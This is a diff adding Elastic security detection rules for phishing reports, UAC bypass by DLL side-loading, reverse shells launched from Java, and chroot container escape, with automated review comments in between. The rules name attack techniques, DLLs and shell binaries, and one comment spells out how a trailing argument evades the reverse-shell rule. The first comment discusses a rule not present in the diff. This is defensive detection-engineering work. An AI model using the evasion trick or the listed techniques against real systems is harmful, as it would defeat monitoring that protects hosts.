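Review bot: The investigation guide in `note` tells analysts to look for 4624 logons "after the registry modification", but nothing in this rule touches the registry — the query fires on process starts of an unsigned or mis-named `elevation_service.exe` (or its child `rundll32.exe`/`cmd.exe`/`powershell.exe`) at System integrity, so the sentence reads as copied from another guide. Suggest `Analysts can do this by searching for login events (for example, 4624) to the target host after the suspicious elevation_service.exe execution.` in both the `_110` and `_111` copies, which carry the same text. The `setup` paragraph about adding a custom pipeline for non-agent (beats) indices also does not apply here: `index` is only `logs-endpoint.events.process-*` and the query needs the non-ECS `process.Ext.token.integrity_level_name` field, so a one-line statement that Elastic Defend is required would be more useful than the generic `event.ingested` advice.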
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", + "false_positives": [ + "Legitimate files reported by the users" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Email Reported by User as Malware or Phish", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", + "references": [ + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "rule.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": 
"https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "5930658c-2107-4afc-91af-e0e55b7f7184_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_105.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_105.json new file mode 100644 index 00000000000..4783e976563 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_105.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", + "false_positives": [ + "Legitimate files reported by the users" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Email Reported by User as Malware or Phish", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", + "references": [ + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "rule.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": 
"https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "5930658c-2107-4afc-91af-e0e55b7f7184_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_206.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_206.json new file mode 100644 index 00000000000..8a48544a61a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_206.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", + "false_positives": [ + "Legitimate files reported by the users" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Email Reported by User as Malware or Phish", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", + "references": [ + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "rule.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": 
"https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "5930658c-2107-4afc-91af-e0e55b7f7184_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_108.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_108.json new file mode 100644 index 00000000000..44b370f1bb7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_108.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Privileged IFileOperation COM Interface", + "query": "file where host.os.type == \"windows\" and event.type : \"change\" and process.name : \"dllhost.exe\" and\n /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */\n file.name : (\"wow64log.dll\", \"comctl32.dll\", \"DismCore.dll\", \"OskSupport.dll\", \"duser.dll\", \"Accessibility.ni.dll\") and\n /* has no impact on rule logic just to avoid OS install related FPs */\n not file.path : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*\", \"C:\\\\Windows\\\\WinSxS\\\\*\")\n", + "references": [ + "https://github.com/hfiref0x/UACME", + "https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": 
"5a14d01d-7ac8-4545-914c-b687c2cf66b3_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_109.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_109.json new file mode 100644 index 00000000000..2ba894d18cd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_109.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Privileged IFileOperation COM Interface", + "query": "file where host.os.type == \"windows\" and event.type : \"change\" and process.name : \"dllhost.exe\" and\n /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */\n file.name : (\"wow64log.dll\", \"comctl32.dll\", \"DismCore.dll\", \"OskSupport.dll\", \"duser.dll\", \"Accessibility.ni.dll\") and\n /* has no impact on rule logic just to avoid OS install related FPs */\n not file.path : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*\", \"C:\\\\Windows\\\\WinSxS\\\\*\")\n", + "references": [ + "https://github.com/hfiref0x/UACME", + "https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": 
"5a14d01d-7ac8-4545-914c-b687c2cf66b3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_8.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_8.json new file mode 100644 index 00000000000..ce466f983e6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_8.json 
@@ -0,0 +1,131 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Reverse Shell via Java",
+ "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"linux\" and event.action in (\"connection_accepted\", \"connection_attempted\") and \n process.executable : (\"/usr/bin/java\", \"/bin/java\", \"/usr/lib/jvm/*\", \"/usr/java/*\") and \n not (destination.ip == null or destination.ip == \"0.0.0.0\" or cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n )] by process.entity_id\n [process where host.os.type == \"linux\" and event.action == \"exec\" and \n process.parent.executable : (\"/usr/bin/java\", \"/bin/java\", \"/usr/lib/jvm/*\", \"/usr/java/*\") and\n process.parent.args : \"-jar\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n and not process.parent.args in (\n \"/usr/share/java/jenkins.war\", \"/etc/remote-iot/services/remoteiot.jar\",\n \"/usr/lib64/NetExtender.jar\", \"/usr/lib/jenkins/jenkins.war\"\n )] by process.parent.entity_id\n",
+ "references": [
+ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "5a3d5447-31c9-409a-aed1-72f9921594fd",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.004",
+ "name": "Unix Shell",
+ "reference": "https://attack.mitre.org/techniques/T1059/004/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1071",
+ "name": "Application Layer Protocol",
+ "reference": "https://attack.mitre.org/techniques/T1071/"
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 8
+ },
+ "id": "5a3d5447-31c9-409a-aed1-72f9921594fd_8",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/5ae02ebc-a5de-4eac-afe6-c88de696477d_2.json b/packages/security_detection_engine/kibana/security_rule/5ae02ebc-a5de-4eac-afe6-c88de696477d_2.json
new file mode 100644
index 00000000000..42f67836391
--- /dev/null
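Review bot: The allowlist `and not process.parent.args in ("/usr/share/java/jenkins.war", ...)` in the second sequence step matches any argument of the parent java process, not the value that follows `-jar`, so an attacker can suppress the alert by appending one of the listed paths as a trailing program argument (`java -jar evil.jar /usr/share/java/jenkins.war`); the JVM passes that string to the application untouched. Anchoring the exclusion on the launched archive, e.g. `not process.parent.command_line : ("*-jar /usr/share/java/jenkins.war*", "*-jar /usr/lib/jenkins/jenkins.war*", "*-jar /etc/remote-iot/services/remoteiot.jar*", "*-jar /usr/lib64/NetExtender.jar*")`, keeps the Jenkins/NetExtender tuning without that bypass, assuming Elastic Defend populates `process.parent.command_line` on Linux exec events. Separately, `threat` maps TA0011 Command and Control but `tags` carries only `Tactic: Execution`; the neighbouring rules in this commit carry one `Tactic:` tag per mapped tactic, so `"Tactic: Command and Control"` belongs in `tags`. The first step also discards connections to RFC1918 and other non-routable ranges, so a reverse shell to an internal pivot host is out of scope — a deliberate trade-off, but one worth stating in a `note` since the rule ships without one.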
+++ b/packages/security_detection_engine/kibana/security_rule/5ae02ebc-a5de-4eac-afe6-c88de696477d_2.json 
@@ -0,0 +1,105 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Monitors for the execution of a file system mount followed by a chroot execution. Given enough permissions, a user within a container is capable of mounting the root file system of the host, and leveraging chroot to escape its containarized environment. This behavior pattern is very uncommon and should be investigated.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Chroot Container Escape via Mount",
+ "query": "sequence by host.id, process.parent.entity_id with maxspan=5m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"mount\" and process.args : \"/dev/sd*\" and process.args_count >= 3 and\n process.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"chroot\"]\n",
+ "references": [
+ "https://book.hacktricks.xyz/v/portugues-ht/linux-hardening/privilege-escalation/escaping-from-limited-bash"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args_count",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "5ae02ebc-a5de-4eac-afe6-c88de696477d",
+ "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to \u201cManage \u2192 Policies\u201d, and edit one or more of your Elastic Defend integration policies.\n- Select the\u201d Policy settings\u201d tab, then scroll down to the \u201cLinux event collection\u201d section near the bottom.\n- Check the box for \u201cProcess events\u201d, and turn on the \u201cInclude session data\u201d toggle.\n- If you want to include file and network alerts in Session View, check the boxes for \u201cNetwork and File events\u201d.\n- If you want to enable terminal output capture, turn on the \u201cCapture terminal output\u201d toggle.\nFor more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Domain: Container",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 2
+ },
+ "id": "5ae02ebc-a5de-4eac-afe6-c88de696477d_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106.json
new file mode 100644
index 00000000000..34f422110aa
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106.json
